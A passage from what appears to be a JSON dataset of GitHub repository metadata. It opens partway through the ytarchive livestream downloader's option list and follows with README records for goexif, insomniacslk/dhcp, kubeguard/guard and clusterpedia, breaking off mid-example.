stream\n\n\t--no-frag-files\n\t\tKeep fragment data in memory instead of writing to an intermediate file.\n\t\tThis has the possibility to drastically increase RAM usage if a fragment\n\t\tdownloads particularly slowly as more fragments after it finish first.\n\t\tThis is only an issue when --threads >1\n\t\tHighly recommended if you don't have strict RAM limitations. Especially\n\t\ton Wangblows, which has caused issues with file locking when trying to\n\t\tdelete fragment files.\n\n\t--no-merge\n\t\tDo not run the ffmpeg command for the downloaded streams\n\t\twhen sigint is received. You will be prompted otherwise.\n\n\t--no-save\n\t\tDo not save any downloaded data and files if not having ffmpeg\n\t\trun when sigint is received. You will be prompted otherwise.\n\n\t--no-video\n\t\tIf a googlevideo url is given or passed with --audio-url, do not\n\t\tprompt for a video url. If a video url is given with --video-url\n\t\tthen this is effectively ignored.\n\n\t-n\n\t--no-wait\n\t\tDo not wait for a livestream if it's a future scheduled stream.\n\n\t-o\n\t--output FILENAME_FORMAT\n\t\tSet the output file name EXCLUDING THE EXTENSION. Can include\n\t\tformatting similar to youtube-dl, albeit much more limited.\n\t\tSee FORMAT OPTIONS below for a list of available format keys.\n\t\tDefault is '%(title)s-%(id)s'\n\n\t-q\n\t--quiet\n\t\tPrint nothing to the console except information relevant for user input.\n\n\t--retry-frags ATTEMPTS\n\t\tSet the number of attempts to make when downloading a stream fragment.\n\t\tSet to 0 to retry indefinitely, or until we are completely unable to.\n\t\tDefault is 10.\n\n\t-r\n\t--retry-stream SECONDS\n\t\tIf waiting for a scheduled livestream, re-check if the stream is\n\t\tup every SECONDS instead of waiting for the initial scheduled time.\n\t\tIf SECONDS is less than the poll delay youtube gives (typically\n\t\t15 seconds), then this will be set to the value youtube provides.\n\n\t--save\n\t\tAutomatically save any downloaded data and files if not having\n\t\tffmpeg run when sigint is received. You will be prompted otherwise.\n\n\t--separate-audio\n\t\tSave the audio to a separate file, similar to when downloading\n\t\taudio_only, alongside the final muxed file. This includes embedding\n\t\tmetadata and the thumbnail if set.\n\n\t--threads THREAD_COUNT\n\t\tSet the number of threads to use for downloading audio and video\n\t\tfragments. The total number of threads running will be\n\t\tTHREAD_COUNT * 2 + 3. Main thread, a thread for each audio and\n\t\tvideo download, and THREAD_COUNT number of fragment downloaders\n\t\tfor both audio and video.\n\t\t\n\t\tSetting this to a large number has a chance at causing the download\n\t\tto start failing with HTTP 401. Restarting the download with a smaller\n\t\tthread count until you no longer get 401s should work. Default is 1.\n\n\t-t\n\t--thumbnail\n\t\tDownload and embed the stream thumbnail in the finished file.\n\t\tWhether the thumbnail shows properly depends on your file browser.\n\t\tWindows' seems to work. Nemo on Linux seemingly does not.\n\n\t--trace\n\t\tPrint just about any information that might have reason to be printed.\n\t\tVery spammy, do not use this unless you have good reason.\n\n\t-v\n\t--verbose\n\t\tPrint extra information.\n\n\t-V\n\t--version\n\t\tPrint the version number and exit.\n\n\t--video-url GOOGLEVIDEO_URL\n\t\tPass in the given url as the video fragment url. Must be a\n\t\tGoogle Video url with an itag parameter that is not 140.\n\n\t--vp9\n\t\tIf there is a VP9 version of your selected video quality,\n\t\tdownload that instead of the usual h264.\n\n\t-w\n\t--wait\n\t\tWait for a livestream if it's a future scheduled stream.\n\t\tIf this option is not used when a scheduled stream is provided,\n\t\tyou will be asked if you want to wait or not.\n\n\t--warn\n\t\tPrint warning, errors, and general information. This is the default log\n\t\tlevel.\n\n\t--write-description\n\t\tWrite the video description to a separate .description file.\n\t\n\t--write-mux-file\n\t\tWrite the ffmpeg command that would mux audio and video or put audio\n\t\tinto an mp4 container instead of running the command automatically.\n\t\tUseful if you want to tweak the command, want a higher log level, etc.\n\n\t--write-thumbnail\n\t\tWrite the thumbnail to a separate file.\n\nExamples:\n\tytarchive -w\n\t\tWaits for a stream. Will prompt for a URL and quality.\n\n\tytarchive -w https://www.youtube.com/watch?v=CnWDmKx9cQQ 1080p60/best\n\t\tWaits for the given stream URL. Will prioritize downloading in 1080p60.\n\t\tIf 1080p60 is not an available quality, it will choose the best of what\n\t\tis available.\n\n\tytarchive --threads 3 https://www.youtube.com/watch?v=ZK1GXnz-1Lw best\n\t\tDownloads the given stream with 3 threads in the best available quality.\n\t\tWill ask if you want to wait if the stream is scheduled but not started.\n\n\tytarchive -r 30 https://www.youtube.com/channel/UCZlDXzGoo7d44bwdNObFacg/live best\n\t\tWill wait for a livestream at the given URL, checking every 30 seconds.\n\n\tytarchive -c cookies-youtube-com.txt https://www.youtube.com/watch?v=_touw1GND-M best\n\t\tLoads the given cookies file and attempts to download the given stream.\n\t\tWill ask if you want to wait.\n\n\tytarchive --no-wait --add-metadata https://www.youtube.com/channel/UCvaTdHTWBGv3MKj3KVqJVCw/live best\n\t\tAttempts to download the given stream, and will add metadata to the\n\t\tfinal muxed file. Will not wait if there is no stream or if it has not\n\t\tstarted.\n\n\tytarchive -o '%(channel)s/%(upload_date)s_%(title)s' https://www.youtube.com/watch?v=HxV9UAMN12o best\n\t\tDownload the given stream to a directory with the channel name, and a\n\t\tfile that will have the upload date and stream title. Will prompt to\n\t\twait.\n\n\tytarchive -w -k -t --vp9 --merge --no-frag-files https://www.youtube.com/watch?v=LE8V5iNemBA best\n\t\tWaits, keeps the final .ts files, embeds the stream thumbnail, merges\n\t\tthe downloaded files if download is stopped manually, and keeps\n\t\tfragments in memory instead of writing to intermediate files.\n\t\tDownloads the stream video in VP9 if available. This set of flags will\n\t\tnot require any extra user input if something goes wrong.\n\n\tytarchive -k -t --vp9 --monitor-channel --no-frag-files https://www.youtube.com/channel/UCvaTdHTWBGv3MKj3KVqJVCw/live best\n\t\tSame as above, but waits for a stream on the given channel, and will\n\t\trepeat the cycle after downloading each stream.\n\nFORMAT TEMPLATE OPTIONS\n\tFormat template keys provided are made to be the same as they would be for\n\tyoutube-dl. See https://github.com/ytdl-org/youtube-dl#output-template\n\n\tFor file names, each template substitution is sanitized by replacing invalid file name\n\tcharacters with underscore (_).\n\n\tid (string): Video identifier\n\turl (string): Video URL\n\ttitle (string): Video title\n\tchannel_id (string): ID of the channel\n\tchannel (string): Full name of the channel the livestream is on\n\tupload_date (string: YYYYMMDD): Technically stream start date, UTC timezone - see note below\n\tstart_date (string: YYYYMMDD): Stream start date, UTC timezone\n\tpublish_date (string: YYYYMMDD): Stream publish date, UTC timezone\n\tdescription (string): Video description [disallowed for file name format template]\n\n\tNote on upload_date: rather than the actual upload date, stream start date is used to\n\tprovide a better default date for youtube-dl output templates that use upload_date.\n\tTo get the actual upload date, publish date seems to be the same as upload date for streams.\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rwcarlsen/goexif", "link": "https://github.com/rwcarlsen/goexif", "tags": [], "stars": 551, "description": "Decode embedded EXIF meta data from image files.", "lang": "Go", "repo_lang": "", "readme": "goexif\n======\n\n[![GoDoc](https://godoc.org/github.com/rwcarlsen/goexif?status.svg)](https://godoc.org/github.com/rwcarlsen/goexif)\n\nProvides decoding of basic exif and tiff encoded data. Still in alpha - no guarantees.\nSuggestions and pull requests are welcome. Functionality is split into two packages - \"exif\" and \"tiff\"\nThe exif package depends on the tiff package. \n\nLike goexif? - Bitcoin Cash tips welcome: 1DrU5V37nTXuv4vnRLVpahJEjhdATNgoBh\n\nTo install, in a terminal type:\n\n```\ngo get github.com/rwcarlsen/goexif/exif\n```\n\nOr if you just want the tiff package:\n\n```\ngo get github.com/rwcarlsen/goexif/tiff\n```\n\nExample usage:\n\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"log\"\n\t\"os\"\n\n\t\"github.com/rwcarlsen/goexif/exif\"\n\t\"github.com/rwcarlsen/goexif/mknote\"\n)\n\nfunc ExampleDecode() {\n\tfname := \"sample1.jpg\"\n\n\tf, err := os.Open(fname)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\t// Optionally register camera makenote data parsing - currently Nikon and\n\t// Canon are supported.\n\texif.RegisterParsers(mknote.All...)\n\n\tx, err := exif.Decode(f)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tcamModel, _ := x.Get(exif.Model) // normally, don't ignore errors!\n\tfmt.Println(camModel.StringVal())\n\n\tfocal, _ := x.Get(exif.FocalLength)\n\tnumer, denom, _ := focal.Rat2(0) // retrieve first (only) rat. value\n\tfmt.Printf(\"%v/%v\", numer, denom)\n\n\t// Two convenience functions exist for date/time taken and GPS coords:\n\ttm, _ := x.DateTime()\n\tfmt.Println(\"Taken: \", tm)\n\n\tlat, long, _ := x.LatLong()\n\tfmt.Println(\"lat, long: \", lat, \", \", long)\n}\n```\n\n\n[![githalytics.com alpha](https://cruel-carlota.pagodabox.com/5e166f74cdb82b999ccd84e3c4dc4348 \"githalytics.com\")](http://githalytics.com/rwcarlsen/goexif)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "insomniacslk/dhcp", "link": "https://github.com/insomniacslk/dhcp", "tags": ["dhcpv6", "dhcpv6-packet", "dhcpv6-server", "dhcp", "dhcp-server", "dhcpd", "dhcp-client", "dhcpd-server", "dhcpv4", "golang", "go"], "stars": 551, "description": "DHCPv6 and DHCPv4 packet library, client and server written in Go", "lang": "Go", "repo_lang": "", "readme": "# dhcp\n[![Build Status](https://img.shields.io/github/workflow/status/insomniacslk/dhcp/Tests/master)](https://github.com/insomniacslk/dhcp/actions?query=branch%3Amaster)\n[![GoDoc](https://godoc.org/github.com/insomniacslk/dhcp?status.svg)](https://godoc.org/github.com/insomniacslk/dhcp)\n[![codecov](https://codecov.io/gh/insomniacslk/dhcp/branch/master/graph/badge.svg)](https://codecov.io/gh/insomniacslk/dhcp)\n[![Go Report Card](https://goreportcard.com/badge/github.com/insomniacslk/dhcp)](https://goreportcard.com/report/github.com/insomniacslk/dhcp)\n\nDHCPv4 and DHCPv6 decoding/encoding library with client and server code, written in Go.\n\n# How to get the library\n\nThe library is split into several parts:\n* `dhcpv6`: implementation of DHCPv6 packet, client and server\n* `dhcpv4`: implementation of DHCPv4 packet, client and server\n* `netboot`: network booting wrappers on top of `dhcpv6` and `dhcpv4`\n* `iana`: several IANA constants, and helpers used by `dhcpv6` and `dhcpv4`\n* `rfc1035label`: simple implementation of RFC1035 labels, used by `dhcpv6` and\n `dhcpv4`\n* `interfaces`, a thin layer of wrappers around network interfaces\n\nYou will probably only need `dhcpv6` and/or `dhcpv4` explicitly. The rest is\npulled in automatically if necessary.\n\n\nSo, to get `dhcpv6` and `dhcpv4` just run:\n```\ngo get -u github.com/insomniacslk/dhcp/dhcpv{4,6}\n```\n\n\n# Examples\n\nThe sections below will illustrate how to use the `dhcpv6` and `dhcpv4`\npackages.\n\n* [dhcpv6 client](examples/client6/)\n* [dhcpv6 server](examples/server6/)\n* [dhcpv6 packet crafting](examples/packetcrafting6)\n* TODO dhcpv4 client\n* TODO dhcpv4 server\n* TODO dhcpv4 packet crafting\n\n\nSee more example code at https://github.com/insomniacslk/exdhcp\n\n\n# Public projects that use it\n\n* Facebook's DHCP load balancer, `dhcplb`, https://github.com/facebookincubator/dhcplb\n* Systemboot, a LinuxBoot distribution that runs as system firmware, https://github.com/systemboot/systemboot\n* Router7, a pure-Go router implementation for fiber7 connections, https://github.com/rtr7/router7\n* Beats from ElasticSearch, https://github.com/elastic/beats\n* Bender from Pinterest, a library for load-testing, https://github.com/pinterest/bender\n* FBender from Facebook, a tool for load-testing based on Bender, https://github.com/facebookincubator/fbender\n* CoreDHCP, a fast, multithreaded, modular and extensible DHCP server, https://github.com/coredhcp/coredhcp\n* u-root, an embeddable root file system, https://github.com/u-root/u-root\n* Talos: a modern OS for Kubernetes, https://github.com/talos-systems/talos\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "kubeguard/guard", "link": "https://github.com/kubeguard/guard", "tags": ["kubernetes", "rbac", "github", "google", "appscode"], "stars": 551, "description": "\ud83d\udd11 Kubernetes Authentication & Authorization WebHook Server", "lang": "Go", "repo_lang": "", "readme": "

\n\n[![Build Status](https://github.com/kubeguard/guard/workflows/CI/badge.svg)](https://github.com/kubeguard/guard/actions?workflow=CI)\n[![codecov](https://codecov.io/gh/kubeguard/guard/branch/master/graph/badge.svg)](https://codecov.io/gh/kubeguard/guard)\n[![Docker Pulls](https://img.shields.io/docker/pulls/appscode/guard.svg)](https://hub.docker.com/r/appscode/guard/)\n[![Twitter](https://img.shields.io/twitter/follow/kubeguard.svg?style=social&logo=twitter&label=Follow)](https://twitter.com/intent/follow?screen_name=KubeGuard)\n\n# Guard\nGuard by AppsCode is a [Kubernetes Webhook Authentication](https://kubernetes.io/docs/admin/authentication/#webhook-token-authentication) server. Using guard, you can log into your Kubernetes cluster using various auth providers. Guard also configures groups of authenticated user appropriately. This allows cluster administrator to setup RBAC rules based on membership in groups. Guard supports following auth providers:\n\n- [Static Token File](https://appscode.com/products/guard/latest/guides/authenticator/static_token_file/)\n- [Github](https://appscode.com/products/guard/latest/guides/authenticator/github/)\n- [Gitlab](https://appscode.com/products/guard/latest/guides/authenticator/gitlab/)\n- [Google](https://appscode.com/products/guard/latest/guides/authenticator/google/)\n- [Azure](https://appscode.com/products/guard/latest/guides/authenticator/azure/)\n- [LDAP using Simple or Kerberos authentication](https://appscode.com/products/guard/latest/guides/authenticator/ldap/)\n- [Azure Active Directory via LDAP](https://appscode.com/products/guard/latest/guides/authenticator/ldap_azure/)\n\n## Supported Versions\nKubernetes 1.9+\n\n## Installation\nTo install Guard, please follow the guide [here](https://appscode.com/products/guard/latest/setup/install/).\n\n## Using Guard\nWant to learn how to use Guard? Please start [here](https://appscode.com/products/guard/latest/).\n\n## Contribution guidelines\nWant to help improve Guard? Please start [here](https://appscode.com/products/guard/latest/welcome/contributing/).\n\n## Acknowledgement\n\n- [apprenda-kismatic/kubernetes-ldap](https://github.com/apprenda-kismatic/kubernetes-ldap)\n- [Nike-Inc/harbormaster](https://github.com/Nike-Inc/harbormaster)\n\n## Support\nWe use Slack for public discussions. To chit chat with us or the rest of the community, join us in the [AppsCode Slack team](https://appscode.slack.com/messages/C8M8HANQ0/details/) channel `#guard`. To sign up, use our [Slack inviter](https://slack.appscode.com/).\n\nIf you have found a bug with Guard or want to request for new features, please [file an issue](https://github.com/kubeguard/guard/issues/new).\n\n

\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "clusterpedia-io/clusterpedia", "link": "https://github.com/clusterpedia-io/clusterpedia", "tags": ["k8s-sig-multicluster", "multi-cloud-kubernetes", "multi-cluster", "kubernetes", "k8s"], "stars": 551, "description": "The Encyclopedia of Kubernetes clusters", "lang": "Go", "repo_lang": "", "readme": "
\n

\n The Encyclopedia of Kubernetes clusters\n

\n\n# Clusterpedia\n![build](https://github.com/clusterpedia-io/clusterpedia/actions/workflows/ci.yml/badge.svg)\n[![License](https://img.shields.io/github/license/clusterpedia-io/clusterpedia)](/LICENSE)\n[![Go Report Card](https://goreportcard.com/badge/github.com/clusterpedia-io/clusterpedia)](https://goreportcard.com/report/github.com/clusterpedia-io/clusterpedia)\n[![Release](https://img.shields.io/github/v/release/clusterpedia-io/clusterpedia)](https://github.com/clusterpedia-io/clusterpedia/releases)\n[![Artifact Hub](https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/clusterpedia)](https://artifacthub.io/packages/search?repo=clusterpedia)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/5539/badge)](https://bestpractices.coreinfrastructure.org/projects/5539)\n[![Join Slack channel](https://img.shields.io/badge/slack-@cncf/clusterpedia-30c000.svg?logo=slack)](https://cloud-native.slack.com/messages/clusterpedia)\n\nThis name Clusterpedia is inspired by Wikipedia. It is an encyclopedia of multi-cluster to synchronize, search for, and simply control multi-cluster resources. \n\nClusterpedia can synchronize resources with multiple clusters and provide more powerful search features on the basis of compatibility with Kubernetes OpenAPI to help you effectively get any multi-cluster resource that you are looking for in a quick and easy way. \n\n> The capability of Clusterpedia is not only to search for and view but also simply control resources in the future, just like Wikipedia that supports for editing entries.\n\n\n\n**Clusterpedia is a [Cloud Native Computing Foundation](https://cncf.io/) sandbox project.**\n> If you want to join the clusterpedia channel on CNCF slack, please **[get invite to CNCF slack](https://slack.cncf.io/)** and then join the [#clusterpedia](https://cloud-native.slack.com/messages/clusterpedia) channel.\n\n## Why Clusterpedia\nClusterpedia can be deployed as a standalone platform or integrated with [Cluster API](https://github.com/kubernetes-sigs/cluster-api), [Karmada](https://github.com/karmada-io/karmada), [Clusternet](https://github.com/clusternet/clusternet) and other multi-cloud platforms\n\n### Automatic synchronization of clusters managed by multi-cloud platforms\nThe clusterpedia can automatically synchronize the resources within the cluster managed by the multi-cloud platform.\n\nUsers do not need to maintain Clusterpedia manually, Clusterpedia can work as well as the internal components of the multi-cloud platforms.\n\nLean More About [Interfacing to Multi-Cloud Platforms](https://clusterpedia.io/docs/usage/interfacing-to-multi-cloud-platforms/)\n\n### More retrieval features and compatibility with **Kubernetes OpenAPI**\n* Support for retrieving resources using `kubectl`, `client-go` or `controller-runtime/client`, [client-go example](https://github.com/clusterpedia-io/client-go/blob/main/examples/list-clusterpedia-resources/main.go)\n* The resource metadata can be retrived via API or [client-go/metadata](https://pkg.go.dev/k8s.io/client-go/metadata)\n* Rich retrieval conditions: [Filter by cluster/namespace/name/creation](https://clusterpedia.io/docs/usage/search/multi-cluster/#basic-features), [Search by parent or ancestor owner](https://clusterpedia.io/docs/usage/search/multi-cluster/#search-by-parent-or-ancestor-owner),[Multi-Cluster Label Selector](https://clusterpedia.io/docs/usage/search/#label-selector), [Enhanced Field Selector](https://clusterpedia.io/docs/usage/search/#field-selector), [Custom Search Conditions](https://clusterpedia.io/docs/usage/search/#advanced-searchcustom-conditional-search), etc.\n### Support for importing Kubernetes 1.10+\n### Automic conversion of different versions of Kube resources and support for multiple version of resources\n* Even if you import different version of Kube, we can still use the same resource version to retrieve resources\n> For example, we can use `v1`, `v1beta2`, `v1beta1` version to retrieve the Deployments resources in different clusters.\n> \n> Notes: The version of *deployments* is `v1beta1` in Kubernetes 1.10 and it is `v1` in Kubernetes 1.24.\n```bash\n$ kubectl get --raw \"/apis/clusterpedia.io/v1beta1/resources/apis/apps\" | jq\n{\n \"kind\": \"APIGroup\",\n \"apiVersion\": \"v1\",\n \"name\": \"apps\",\n \"versions\": [\n {\n \"groupVersion\": \"apps/v1\",\n \"version\": \"v1\"\n },\n {\n \"groupVersion\": \"apps/v1beta2\",\n \"version\": \"v1beta2\"\n },\n {\n \"groupVersion\": \"apps/v1beta1\",\n \"version\": \"v1beta1\"\n }\n ],\n \"preferredVersion\": {\n \"groupVersion\": \"apps/v1\",\n \"version\": \"v1\"\n }\n}\n```\n### A single API can be used to retrieve different types of resources\n* Use [`Collection Resource`](https://clusterpedia.io/docs/concepts/collection-resource/) to retrieve different types of resources, such as `Deployment`, `DaemonSet`, `StatefulSet`.\n```bash\n$ kubectl get collectionresources\nNAME RESOURCES\nany *\nworkloads deployments.apps,daemonsets.apps,statefulsets.apps\nkuberesources .*,*.admission.k8s.io,*.admissionregistration.k8s.io,*.apiextensions.k8s.io,*.apps,*.authentication.k8s.io,*.authorization.k8s.io,*.autoscaling,*.batch,*.certificates.k8s.io,*.coordination.k8s.io,*.discovery.k8s.io,*.events.k8s.io,*.extensions,*.flowcontrol.apiserver.k8s.io,*.imagepolicy.k8s.io,*.internal.apiserver.k8s.io,*.networking.k8s.io,*.node.k8s.io,*.policy,*.rbac.authorization.k8s.io,*.scheduling.k8s.io,*.storage.k8s.io\n```\n### Diverse policies and intelligent synchronization\n* [Wildcards](https://clusterpedia.io/docs/usage/sync-resources/#using-wildcards-to-sync-resources) can be used to sync all types of resources within a specified group or cluster.\n* [Support for synchronizing all custom resources](https://clusterpedia.io/docs/usage/sync-resources/#sync-all-custom-resources)\n* The type and version of resources that Clusterpedia is synchroizing with can be adapted to you CRD and AA changes\n### Unify the search entry for master clusters and multi-cluster resources\n* Based on [Aggregated API](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/), the entry portal for multi-cluster retrieval is the same as that of the master cluster(IP:PORT)\n### Very low memory usage and weak network optimization\n* Optimized caches used by informer, so the memory usage is very low for resource synchronization.\n* Automatic start/stop synchronization based on cluster health status\n### High availability\n### No dependency on specific storage components\nClusterpedia does not care about storage components and uses the storage layer to attach specific storage components,\nand will also add storage layers for **graph databases** and **ES** in the future\n\n## Architecture \n
\nThe architecture consists of four parts:\n\n* **Clusterpedia APIServer**: Register to `Kubernetes APIServer` by the means of [Aggregated API](https://kubernetes.io/docs/concepts/extend-kubernetes/api-extension/apiserver-aggregation/) and provide services through a unified entrance\n* **ClusterSynchro Manager**: Manage the cluster synchro that is used to synchronize cluster resources\n* **Storage Layer**: Connect with a specific storage component and then register to Clusterpedia APIServer and ClusterSynchro Manager via a storage layer interface\n* **Storage Component**: A specific storage facility such as **MySQL**, **PostgreSQL**, **Redis** or other **Graph Databases**\n\nIn addition, Clusterpedia will use the Custom Resource - *PediaCluster* to implement cluster authentication and configure resources for synchronization.\n\nClusterpedia also provides a `Default Storage Layer` that can connect with **MySQL** and **PostgreSQL**.\n> Clusterpedia does not care about the specific storage components used by users,\n> you can choose or implement the storage layer according to your own needs,\n> and then register the storage layer in Clusterpedia as a plug-in\n\n---\n[Installation](https://clusterpedia.io/docs/installation/) | [Import Clusters](https://clusterpedia.io/docs/usage/import-clusters/) | [Sync Cluster Resources](https://clusterpedia.io/docs/usage/sync-resources/)\n---\n\n## Search Label and URL Query\n|Role| search label key|url query|\n| -- | --------------- | ------- |\n|Filter cluster names|`search.clusterpedia.io/clusters`|`clusters`|\n|Filter namespaces|`search.clusterpedia.io/namespaces`|`namespaces`|\n|Filter resource names|`search.clusterpedia.io/names`|`names`|\n|Fuzzy Search by resource name|`internalstorage.clusterpedia.io/fuzzy-name`|-|\n|Since creation time|`search.clusterpedia.io/since`|`since`|\n|Before creation time|`search.clusterpedia.io/before`|`before`|\n|Specified Owner UID|`search.clusterpedia.io/owner-uid`|`ownerUID`|\n|Specified Owner Seniority|`search.clusterpedia.io/owner-seniority`|`ownerSeniority`|\n|Specified Owner Name|`search.clusterpedia.io/owner-name`|`ownerName`|\n|Specified Owner Group Resource|`search.clusterpedia.io/owner-gr`|`ownerGR`|\n|Order by fields|`search.clusterpedia.io/orderby`|`orderby`|\n|Set page size|`search.clusterpedia.io/size`|`limit`|\n|Set page offset|`search.clusterpedia.io/offset`|`continue`|\n|Response include Continue|`search.clusterpedia.io/with-continue`|`withContinue`\n|Response include remaining count|`search.clusterpedia.io/with-remaining-count`|`withRemainingCount`\n|[Custom Where SQL](https://clusterpedia.io/docs/usage/search/#advanced-searchcustom-conditional-search)|-|`whereSQL`|\n|[Get only the metadata of the collection resource](https://clusterpedia.io/docs/usage/search/collection-resource#only-metadata) | - |`onlyMetadata` |\n|[Specify the groups of `any collectionresource`](https://clusterpedia.io/docs/usage/search/collection-resource#any-collectionresource) | - | `groups` |\n|[Specify the resources of `any collectionresource`](https://clusterpedia.io/docs/usage/search/collection-resource#any-collectionresource) | - | `resources` |\n\n**Both Search Labels and URL Query support same operators as Label Selector:**\n* `exist`, `not exist`\n* `=`, `==`, `!=`\n* `in`, `notin`\n\nMore information about [Search Conditions](https://clusterpedia.io/docs/usage/search/),\n[Label Selector](https://clusterpedia.io/docs/usage/search/#label-selector) and [Field Selector](https://clusterpedia.io/docs/usage/search/#field-selector)\n\n## Usage Samples\nYou can search for resources configured in *PediaCluster*, Clusterpedia supports two types of resource search:\n* Resources that are compatible with **Kubernetes OpenAPI**\n* [`Collection Resource`](https://clusterpedia.io/docs/concepts/collection-resource/)\n```sh\n$ kubectl api-resources | grep clusterpedia.io\ncollectionresources clusterpedia.io/v1beta1 false CollectionResource\nresources clusterpedia.io/v1beta1 false Resources\n```\n### Use a compatible way with Kubernetes OpenAPI\nIt is possible to search resources via URL, but using `kubectl` may be more convenient if\nyou [configured the cluster shortcuts for `kubectl`](https://clusterpedia.io/docs/usage/access-clusterpedia/#configure-the-cluster-shortcut-for-kubectl).\n\nWe can use `kubectl --cluster ` to specify the cluster, if `` is `clusterpedia`,\nit meas it is a multi-cluster search operation.\n\nFirst check which resources are synchronized. We cannot find a resource until it is properly synchronized:\n```sh\n$ kubectl --cluster clusterpedia api-resources\nNAME SHORTNAMES APIVERSION NAMESPACED KIND\nconfigmaps cm v1 true ConfigMap\nevents ev v1 true Event\nnamespaces ns v1 false Namespace\nnodes no v1 false Node\npods po v1 true Pod\nservices svc v1 true Service\ndaemonsets ds apps/v1 true DaemonSet\ndeployments deploy apps/v1 true Deployment\nreplicasets rs apps/v1 true ReplicaSet\nstatefulsets sts apps/v1 true StatefulSet\ncronjobs cj batch/v1 true CronJob\njobs batch/v1 true Job\nclusters cluster.kpanda.io/v1alpha1 false Cluster\ningressclasses networking.k8s.io/v1 false IngressClass\ningresses ing networking.k8s.io/v1 true Ingress\nclusterrolebindings rbac.authorization.k8s.io/v1 false ClusterRoleBinding\nclusterroles rbac.authorization.k8s.io/v1 false ClusterRole\nroles rbac.authorization.k8s.io/v1 true Role\n\n$ kubectl --cluster cluster-1 api-resources\n...\n```\n\n#### Search in Multiple Clusters\n> Usage of [multi-cluster search](https://clusterpedia.io/docs/usage/search/multi-cluster/) in documents\n\n**Get deployments in the `kube-system` namespace of all clusters:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -n kube-system\nCLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\ncluster-1 coredns 2/2 2 2 68d\ncluster-2 calico-kube-controllers 1/1 1 1 64d\ncluster-2 coredns 2/2 2 2 64d\n```\n\n**Get deployments in the two namespaces `kube-system` and `default` of all clusters:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -A -l \"search.clusterpedia.io/namespaces in (kube-system, default)\"\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\nkube-system cluster-1 coredns 2/2 2 2 68d\nkube-system cluster-2 calico-kube-controllers 1/1 1 1 64d\nkube-system cluster-2 coredns 2/2 2 2 64d\ndefault cluster-2 dd-airflow-scheduler 0/1 1 0 54d\ndefault cluster-2 dd-airflow-web 0/1 1 0 54d\ndefault cluster-2 hello-world-server 1/1 1 1 27d\ndefault cluster-2 openldap 1/1 1 1 41d\ndefault cluster-2 phpldapadmin 1/1 1 1 41d\n```\n\n**Get deployments in the `kube-system` and `default` namespaces in cluster-1 and cluster-2:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -A -l \"search.clusterpedia.io/clusters in (cluster-1, cluster-2),\\\n search.clusterpedia.io/namespaces in (kube-system,default)\"\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\nkube-system cluster-1 coredns 2/2 2 2 68d\nkube-system cluster-2 calico-kube-controllers 1/1 1 1 64d\nkube-system cluster-2 coredns 2/2 2 2 64d\ndefault cluster-2 dd-airflow-scheduler 0/1 1 0 54d\ndefault cluster-2 dd-airflow-web 0/1 1 0 54d\ndefault cluster-2 hello-world-server 1/1 1 1 27d\ndefault cluster-2 openldap 1/1 1 1 41d\ndefault cluster-2 phpldapadmin 1/1 1 1 41d\n```\n\n**Get deployments in the `kube-system` and `default` namespaces in cluster-1 and cluster-2:**\n```sh\n$ kubectl --cluster clusterpedia get deployments -A -l \"search.clusterpedia.io/clusters in (cluster-1, cluster-2),\\\n search.clusterpedia.io/namespaces in (kube-system,default),\\\n search.clusterpedia.io/orderby=name\"\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\nkube-system cluster-2 calico-kube-controllers 1/1 1 1 64d\nkube-system cluster-1 coredns 2/2 2 2 68d\nkube-system cluster-2 coredns 2/2 2 2 64d\ndefault cluster-2 dd-airflow-scheduler 0/1 1 0 54d\ndefault cluster-2 dd-airflow-web 0/1 1 0 54d\ndefault cluster-2 hello-world-server 1/1 1 1 27d\ndefault cluster-2 openldap 1/1 1 1 41d\ndefault cluster-2 phpldapadmin 1/1 1 1 41d\n```\n\n#### Search a specific cluster\n> Usage of [specified cluster search](https://clusterpedia.io/docs/usage/search/specified-cluster/) in documents\n\n**If you want to search a specific cluster for any resource therein, you can add --cluster to specify the cluster name:**\n```sh\n$ kubectl --cluster cluster-1 get deployments -A\nNAMESPACE CLUSTER NAME READY UP-TO-DATE AVAILABLE AGE\ncalico-apiserver cluster-1 calico-apiserver 1/1 1 1 68d\ncalico-system cluster-1 calico-kube-controllers 1/1 1 1 68d\ncalico-system cluster-1 calico-typha 1/1 1 1 68d\ncapi-system cluster-1 capi-controller-manager 1/1 1 1 42d\ncapi-kubeadm-bootstrap-system cluster-1 capi-kubeadm-bootstrap-controller-manager 1/1 1 1 42d\ncapi-kubeadm-control-plane-system cluster-1 capi-kubeadm-control-plane-controller-manager 1/1 1 1 42d\ncapv-system cluster-1 capv-controller-manager 1/1 1 1 42d\ncert-manager cluster-1 cert-manager 1/1 1 1 42d\ncert-manager cluster-1 cert-manager-cainjector 1/1 1 1 42d\ncert-manager cluster-1 cert-manager-webhook 1/1 1 1 42d\nclusterpedia-system cluster-1 clusterpedia-apiserver 1/1 1 1 27m\nclusterpedia-system cluster-1 clusterpedia-clustersynchro-manager 1/1 1 1 27m\nclusterpedia-system cluster-1 clusterpedia-internalstorage-mysql 1/1 1 1 29m\nkube-system cluster-1 coredns 2/2 2 2 68d\ntigera-operator cluster-1 tigera-operator 1/1 1 1 68d\n```\nExcept for `search.clusterpedia.io/clusters`, the support for other complex queries is same as that for multi-cluster search.\n\nIf you want to learn about the details of a resource, you need to specify which cluster it is:\n```sh\n$ kubectl --cluster cluster-1 -n kube-system get deployments coredns 